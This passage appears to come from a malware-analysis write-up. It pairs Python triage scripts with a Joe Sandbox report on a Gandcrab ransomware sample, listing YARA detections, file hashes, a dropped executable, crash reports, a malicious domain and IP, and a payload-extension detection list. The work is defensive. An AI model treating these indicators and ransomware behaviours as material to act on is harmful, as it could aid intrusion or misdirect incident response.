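PAYLOAD_EXTENSIONS = {".rar", ".zip", ".7z", ".cab", ".exe", ".dll", ".scr"}


def parse_request(raw):
    """Split a raw HTTP/1.x request into request line fields and a lower-cased header dict."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def host_and_port(host_header, default=80):
    """Split 'host:port' from a Host header; fall back to the default port when absent."""
    host, sep, port = host_header.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return host_header, default


def check_request(req):
    """Return (host, findings); each finding is a (code, detail) tuple."""
    findings = []
    host, port = host_and_port(req["headers"].get("host", ""))
    if port not in EXPECTED_HTTP_PORTS:
        findings.append(("nonstandard_port", port))          # HTTP on a port where it is not expected
    path = req["target"].split("?", 1)[0]
    ext = posixpath.splitext(path)[1].lower()
    if ext in PAYLOAD_EXTENSIONS:
        findings.append(("payload_download", ext))           # archive/executable fetched over HTTP
    if "//" in path:
        findings.append(("doubled_slash", path))             # hard-coded path concatenation, weak signal
    return host, findings


def triage_all(raw_requests):
    """Parse and check every request; returns a list of (host, target, findings)."""
    results = []
    for raw in raw_requests:
        req = parse_request(raw)
        host, findings = check_request(req)
        results.append((host, req["target"], findings))
    return results


if __name__ == "__main__":
    for host, target, findings in triage_all(CAPTURED_REQUESTS):
        print("%s %s -> %s" % (host, target, ", ".join("%s=%s" % f for f in findings) or "clean"))
```

Both captured requests produce the same three findings; the second Snort hit (TCP session 49708) is the k2.rar fetch. For a real deployment the host would additionally be matched against the DNS answer above (ddos.dnsnb8.net resolving to 63.251.106.25) so that the IP-based TCP view and the name-based HTTP view point at the same indicator.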

                                  Target ID:0
                                  Start time:23:41:20
                                  Start date:31/08/2022
                                  Path:C:\Users\user\Desktop\SY5DeZW6pz.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SY5DeZW6pz.exe"
                                  Imagebase:0xf390000
                                  File size:960512 bytes
                                  MD5 hash:536F2C1238EF65A64820C35D4504CE67
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.324852504.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.307798996.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.353018126.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.317764936.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.353129829.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.324788306.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.317714677.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: kevoreilly
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: kevoreilly
                                  Reputation:low

                                  Target ID:1
                                  Start time:23:41:21
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  Imagebase:0xc20000
                                  File size:15872 bytes
                                  MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 76%, Metadefender, Browse
                                  • Detection: 100%, ReversingLabs
                                  Reputation:moderate

                                  Target ID:4
                                  Start time:23:41:29
                                  Start date:31/08/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
                                  Imagebase:0xdf0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:6
                                  Start time:23:41:38
                                  Start date:31/08/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432
                                  Imagebase:0xdf0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

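Targets 4 and 6 above are Windows Error Reporting launched with `-p 5580` and `-p 5540`: each `-p` names the PID of a process that faulted, but the report lists the WerFault instances as separate targets without tying them back to the process that crashed. The following is an added triage example, not code from Joe Sandbox or from the report: it parses WerFault command lines and maps each one to the process record with that PID. The PIDs given for targets 0 and 1, and the sample's path, are assumptions made so the constructed records line up with the two command lines shown; the report does not state them.

```python
"""Correlate WerFault.exe launches in a sandbox process list with the faulting process.

Added example, not part of the Joe Sandbox report or its tooling.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Proc:
    target_id: int
    pid: int
    path: str
    cmdline: str


# Constructed from the report's target list. The PIDs of targets 0 and 1 are
# NOT shown in the report and are ASSUMED here so that they line up with the
# -p values on the two WerFault command lines; the sample's path is assumed too.
PROCESSES: List[Proc] = [
    Proc(0, 5540, r"C:\Users\user\Desktop\SY5DeZW6pz.exe",
         r"C:\Users\user\Desktop\SY5DeZW6pz.exe"),
    Proc(1, 5580, r"C:\Users\user\AppData\Local\Temp\vSQshX.exe",
         r"C:\Users\user\AppData\Local\Temp\vSQshX.exe"),
    Proc(4, 6012, r"C:\Windows\SysWOW64\WerFault.exe",
         r"C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532"),
    Proc(6, 6104, r"C:\Windows\SysWOW64\WerFault.exe",
         r"C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432"),
]

# A switch is "-name" optionally followed by a numeric value.
_FLAG_RE = re.compile(r"-(?P<name>[A-Za-z]+)(?:\s+(?P<value>\d+))?")
_WERFAULT_RE = re.compile(r"werfault\.exe(?P<args>.*)$", re.IGNORECASE)


def parse_werfault(cmdline: str) -> Optional[Dict[str, object]]:
    """Return the WerFault switches that matter for triage, or None.

    -p <pid> is the process WER was launched for and -u marks a user-mode
    fault. -s <n> is treated as the handle WER uses to talk to the faulting
    process (assumption: only its value is recorded, it is not interpreted).
    A WerFault line without -p cannot be correlated and yields None.
    """
    m = _WERFAULT_RE.search(cmdline)
    if not m:
        return None
    flags = {f.group("name").lower(): f.group("value")
             for f in _FLAG_RE.finditer(m.group("args"))}
    if not flags.get("p"):
        return None
    return {
        "user_mode": "u" in flags,
        "pid": int(flags["p"]),
        "handle": int(flags["s"]) if flags.get("s") else None,
    }


def correlate_crashes(procs: List[Proc]) -> Dict[int, Optional[Proc]]:
    """Map each WerFault target_id to the Proc whose PID it was launched for.

    None means WER was launched for a PID that is not in the list, e.g. a
    process the sandbox never recorded as a target of its own.
    """
    by_pid = {p.pid: p for p in procs}
    result: Dict[int, Optional[Proc]] = {}
    for p in procs:
        info = parse_werfault(p.cmdline)
        if info is None:
            continue
        result[p.target_id] = by_pid.get(int(info["pid"]))
    return result


def crashed_targets(procs: List[Proc]) -> List[int]:
    """Target IDs of the processes that faulted, in WerFault launch order."""
    return [c.target_id for c in correlate_crashes(procs).values() if c is not None]


if __name__ == "__main__":
    for wer_id, victim in correlate_crashes(PROCESSES).items():
        who = f"target {victim.target_id} ({victim.path})" if victim else "an unlisted PID"
        print(f"WerFault target {wer_id} reported a fault in {who}")
```

Reading the two WerFault lines this way says that both the dropped vSQshX.exe and the parent that dropped it faulted during the run, which is consistent with the "One or more processes crash" signature and is worth checking against the memory dumps before concluding the payload executed to completion.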
                                  No disassembly